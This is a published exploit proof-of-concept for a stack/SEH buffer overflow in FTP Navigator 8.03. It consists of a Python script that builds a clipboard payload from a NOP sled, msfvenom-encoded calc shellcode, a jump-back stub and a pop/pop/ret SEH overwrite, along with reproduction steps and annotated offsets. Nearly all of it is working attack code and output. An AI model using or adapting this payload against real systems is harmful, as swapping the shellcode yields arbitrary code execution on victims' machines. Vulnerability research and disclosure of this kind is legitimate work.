
FTP Navigator 8.03 – Stack Overflow (SEH)



# Exploit Title: FTP Navigator 8.03 - Stack Overflow (SEH)
# Date: December 28th, 2019
# Exploit Author: boku
# Discovered by: Chris Inzinga
# Original DoS: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH) 
# Original DoS Link: https://www.exploit-db.com/exploits/47794
# Software Vendor: http://www.internet-soft.com/
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
# Version: Version 8.03
# Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64)
# Recreate:

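#!/usr/bin/python
"""Generate 'poc.txt' for the FTP Navigator 8.03 'Custom Command' SEH overflow.

Recreate (steps from the original advisory):
  1) Generate 'poc.txt' with this script (Python 2.7 or 3; the file is
     written in binary mode so no byte of the payload is altered).
  2) On the target Windows machine, open 'poc.txt' with Notepad, then
     Select-All & Copy.
  3) Install & open FTP Navigator v8.03.
  4) Menu Bar > FTP-Server drop-down > click Custom Command
     - a textbox appears at the bottom of the right window.
  5) Paste the payload from the generated file into the textbox.
  6) Click "Do it" - the program crashes and calc.exe opens.

Payload layout (byte offsets from the start of the buffer):
  [0, 400)       NOP sled
  [400, 847)     447-byte msfvenom windows/exec CMD=calc, x86/alpha_upper
  [847, 4093)    0x41 filler
  [4093, 4112)   JMP2NOPS stub (19 bytes): finds its own address and jumps
                 back into the NOP sled
  [4112, 4116)   nSEH: short jump 19 bytes back to JMP2NOPS
  [4116, 4119)   SEH: low three bytes of 0x00457576 (pop pop ret, ftpnavi.exe)

Only the low three bytes of the handler address are written; the leading
0x00 of 0x00457576 is whatever already sits at that position (presumably
the string terminator of the pasted command), which is why a 3-byte
overwrite works and why the payload must stay null-free.  The handler
address is specific to ftpnavi.exe 8.03 (no rebase / ASLR / SafeSEH per
the advisory); any other build needs a fresh pop/pop/ret.

NOTE(review): the payload reaches the program through Notepad and the
clipboard, so bytes >= 0x80 (the NOPs, the getPC stub, JMP2NOPS) have to
survive the target's ANSI code page on the round trip.  The original
author verified this on Windows 7 SP1 x64 only.
"""
import struct

blt = '\033[92m[\033[0m+\033[92m]\033[0m '           # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '           # bash red   error   bullet

# Distance from the start of the custom-command buffer to nSEH (from the
# original advisory's crash analysis).
NSEH_OFFSET = 4112

# 0x00457576 [ftpnavi.exe] : pop edx # pop ebx # ret
# | Rebase: False | ASLR: False | SafeSEH: False
# | (c:\FTP Navigator\ftpnavi.exe) | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ}
SEH_HANDLER = 0x00457576

NOP_SLED = b'\x90' * 400

# msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
# x86/alpha_upper succeeded with size 447 (iteration=0)
SHELLCODE = (
    b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
    b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
    b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
    b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
    b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
    b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
    b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
    b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
    b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
    b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
    b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
    b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
    b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
    b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
    b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
    b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
    b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
    b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
    b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
    b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
    b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
    b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
    b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
    b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
    b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
    b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
    b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
    b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
    b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
    b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
    b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
    b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
    b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
    b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
    b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
    b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
    b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
    b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
    b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
    b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
    b"\x4c\x32\x43\x53\x30\x41\x41"
)

# Position-independent stub, reached from nSEH, that lands execution at the
# top of the buffer.  It is null-free: the 16-bit OR/SUB pair below is used
# (presumably) because a 32-bit `sub ecx, 0xffc` would encode null bytes.
JMP2NOPS = (
    b'\xe8\xff\xff\xff\xff'  # call -1: target is the last \xff of this call; pushes the address of the byte after it
    b'\xc3'                  # the CPU decodes \xff\xc3 = inc ebx (harmless), so this is NOT a ret
    b'\x59'                  # pop ecx: ecx = pushed address = stub start + 5
    b'\x31\xd2'              # xor edx, edx
    b'\x66\x81\xca\xfc\x0f'  # or dx, 4092  -> edx = 0x00000ffc
    b'\x66\x29\xd1'          # sub cx, dx   (the original comment's "sub ex, dx" was a typo): ecx -= 4092
    b'\xff\xe1'              # jmp ecx: stub starts at 4093, so ecx = 4098 - 4092 = 6 -> inside the NOP sled
)
# NOTE(review): `sub cx, dx` is a 16-bit subtract and does not borrow into
# the upper half of ecx.  If the stub's stack address has (addr & 0xffff)
# < 0x0ffc, the jump lands 64 KiB too high.  It worked on the original
# author's machine; keep this in mind if the crash reproduces but calc
# does not pop.

# jmp short -0x15: measured from the end of this 2-byte jump, 21 bytes back
# is the start of the 19-byte JMP2NOPS stub.  Padded to 4 bytes with NOPs.
NSEH = b'\xeb\xeb\x90\x90'


def build_payload():
    """Return the poc bytes: NOP sled + shellcode + filler + JMP2NOPS + nSEH + SEH.

    The filler length is derived from NSEH_OFFSET so the stub always ends
    exactly at nSEH.  Raises ValueError if the shellcode no longer fits:
    the original multiplied by a negative count, which silently produced
    an empty filler and a misaligned payload.
    """
    filler_len = NSEH_OFFSET - len(NOP_SLED) - len(SHELLCODE) - len(JMP2NOPS)
    if filler_len < 0:
        raise ValueError('shellcode too large for the %d-byte buffer' % NSEH_OFFSET)
    # SEH 3-byte overwrite: low three bytes of the handler, little-endian.
    seh = struct.pack('<I', SEH_HANDLER)[:3]
    return NOP_SLED + SHELLCODE + (b'\x41' * filler_len) + JMP2NOPS + NSEH + seh


def write_poc(path='poc.txt'):
    """Write the payload to *path* in binary mode (no newline translation)."""
    with open(path, 'wb') as fh:
        fh.write(build_payload())


if __name__ == '__main__':
    File = 'poc.txt'
    try:
        write_poc(File)
    except (IOError, OSError) as exc:  # narrowed from a bare except that hid the reason
        print(err + File + ' failed to create: ' + str(exc))
    else:
        print(blt + File + " created successfully ")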
            





https://www.exploit-db.com/exploits/47812
